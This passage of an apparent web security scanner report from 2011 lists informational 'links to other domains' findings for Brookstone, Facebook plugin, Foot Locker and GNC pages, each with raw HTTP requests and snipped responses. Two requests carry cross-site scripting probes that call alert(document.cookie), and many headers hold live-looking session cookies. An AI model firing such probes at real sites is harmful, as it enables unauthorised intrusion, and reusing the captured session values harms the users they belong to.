Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543287875%3B; s_sess=%20s_evar2%3Dworldlandingpage_outdoor_living%257Ccxtopnav1fdt%257Coutdoor_living%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Doutdoor%25252520living%2525253Aoutdoor%25252520%25252526amp%2525253B%25252520patio%25252520furniture%2525253Aoutdoor%25252520wood%25252520furniture%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html%2525253Fbkiid%2525253DsubCategoryLandingPage%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 13:35:49 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:48 GMT
Set-Cookie: TS657dfa=3e167d73b2313d63b52b8915c1fc32dbe754034066e5db8e4dd0fe0560ac0ec56e0e0800; Path=/
Content-Length: 102983


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br /><a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=shockwaveFlash"> Click here to install latest Flash Player</a>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

17.32. http://www.brookstone.com/outdoor-living.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /outdoor-living.html

Issue detail

The page was loaded from a URL containing a query string (see the request line below). The response contains the following links to other domains (see the excerpted response below).

Request

GET /outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=homePage|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512915786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 04:58:40 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:40 GMT
Content-Length: 118287


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br /><a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=shockwaveFlash"> Click here to install latest Flash Player</a>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

17.33. https://www.brookstone.com/formhandlerservlet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /formhandlerservlet

Issue detail

The page was loaded from a URL containing a query string (see the request line below). The response contains the following links to other domains (see the excerpted response below).

Request

POST /formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: http://www.brookstone.com/shoppingCart.jsp.vr
Cache-Control: max-age=0
Origin: http://www.brookstone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dcheckout%2525253Acart%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/shoppingCart.jsp.vr%25252523_4%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
Content-Length: 21

quantity_1343815425=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:05 GMT
Set-Cookie: TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/
Content-Length: 92549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<div class="veriSign_container">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.brookstone.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

17.34. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.123.61
X-Cnection: close
Date: Mon, 16 May 2011 01:53:22 GMT
Content-Length: 6352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

17.35. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.172.102
X-Cnection: close
Date: Mon, 16 May 2011 10:41:32 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

17.36. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.86.49
X-Cnection: close
Date: Mon, 16 May 2011 01:59:12 GMT
Content-Length: 9048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/PETCO" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174637_78697430614_89181_q.jpg" alt="PETCO" /></a>
...[SNIP]...

17.37. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...
<!-- requestProtocol: https -->

   <script type="text/javascript" src="https://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
</div>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...
<div class="footer-icons-slot"><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.footlocker.com" rel="nofollow"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/www.footlocker.com/31.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--17345.html" target="_blank" rel="nofollow"><img src="//medals.bizrate.com/medals/dynamic/small/17345_medal.gif" alt="bizrate Customer Certified Site - Foot Locker Reviews at Bizrate" width="112" height="37" border="0" /></a>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

17.38. http://www.gnc.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1 HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543402575%7C1308135402575%3B%20gpv_p6%3DHome%2520Page%7C1305545202577%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:22 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115169


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://GNC.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-css.xml -->
<link href="http://GNC.imageg.net/min-cat/site-css.xml.min.css?84" type="text/css" rel="stylesheet" />
<!-- end min-cat section -->
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://GNC.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://GNC.imageg.net/include/shoprunner/css/shoprunner.css" />


<div id="home" class="centered">
...[SNIP]...
<div id="gnc_promo_top_1v1" style="width:990px;border:0px;overflow:hidden;">


<img border="0" name="cms_image55744173_292" src="http://GNC.imageg.net/cms_widgets/47/72/477259_assets/Top_GlobalP_051611.gif" height="45" width="990" align="Default" valign="Default" usemap="#glob_map" /><map name="glob_map">
...[SNIP]...
<a href="/home/index.jsp" title="GNC Live Well&trade;"><img src="http://GNC.imageg.net/images/header/logo.png" id="brand" alt="GNC Live Well&trade;" /></a>
...[SNIP]...
<fieldset>
                   <img src="http://GNC.imageg.net/images/header/search.gif" alt="Search" />
                   <div id="searchInputContainer">
...[SNIP]...
<li>
       <a href="http://gnc.shoplocal.com/gnc/" id="subNav07">Weekly Ads</a>
...[SNIP]...
</strong> <img src="http://GNC.imageg.net/images/header/shoppingCart.gif" alt="Shopping Cart" />
                   <b>
...[SNIP]...
</a><img border="0" name="cms_image81331357" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/Arnell_Left.jpg" height="453" width="223" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL0');" />
<div id="RTCMS_FLASH0"><a id="linkURL1" href="http://get.adobe.com/flashplayer/" style="display:none"></a><img border="0" name="cms_image93516003" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/Alt_Image.jpg" height="453" width="767" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL1');" /></div>
...[SNIP]...
</a><img border="0" name="sub1" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/Featured_Product_051611.jpg" height="126" width="221" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL2');" /></div>
...[SNIP]...
</a><img border="0" name="sub2" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/DOD_051611.jpg" height="126" width="264" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL3');" /></div>
...[SNIP]...
</a><img border="0" name="sub3a" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_1v2.jpg" height="126" width="270" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL4');" /></div>
...[SNIP]...
<td>
<img border="0" name="sub3b" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_2.jpg" height="8" width="228" valign="Default" /></td>
...[SNIP]...
<td height="111">
<script type="text/javascript" src="http://web.aisle7.net/jsapi/1.0/content.js"></script>
...[SNIP]...
<td>
<img border="0" name="sub3c" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_3.jpg" height="7" width="228" valign="Default" /></td>
...[SNIP]...
<div style="float: left; width: 7px">
<img border="0" name="sub3d" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_4.jpg" height="126" width="7" valign="Default" /></div>
...[SNIP]...
<td>
<img border="0" name="cms_image116067563" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/clear_spacer.gif" height="10" width="10" align="Default" valign="Default" /></td>
...[SNIP]...
<td valign="top" align="left" width="147" style="padding-right: 8px; padding-left: 8px; padding-bottom: 8px; line-height: 12px; padding-top: 8px"><a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://gnc.shoplocal.com/gnc/?&amp;ab=CMS:HP:CMS:C51">Shop Local</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://www.gncfranchising.com/dom_home.asp?&amp;ab=CMS:HP:CMS:C52">Open a Franchise</a>
...[SNIP]...
<td valign="top" align="left" width="147" style="padding-right: 8px; padding-left: 8px; padding-bottom: 8px; line-height: 12px; padding-top: 8px"><a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://www.facebook.com/GNCLiveWell">Like us on Facebook</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://twitter.com/GNCLiveWell">Follow Us on Twitter</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://gnc.pittsburghpenguins.com?cid=11011:Pens">Penguins</a>
...[SNIP]...
<br/>
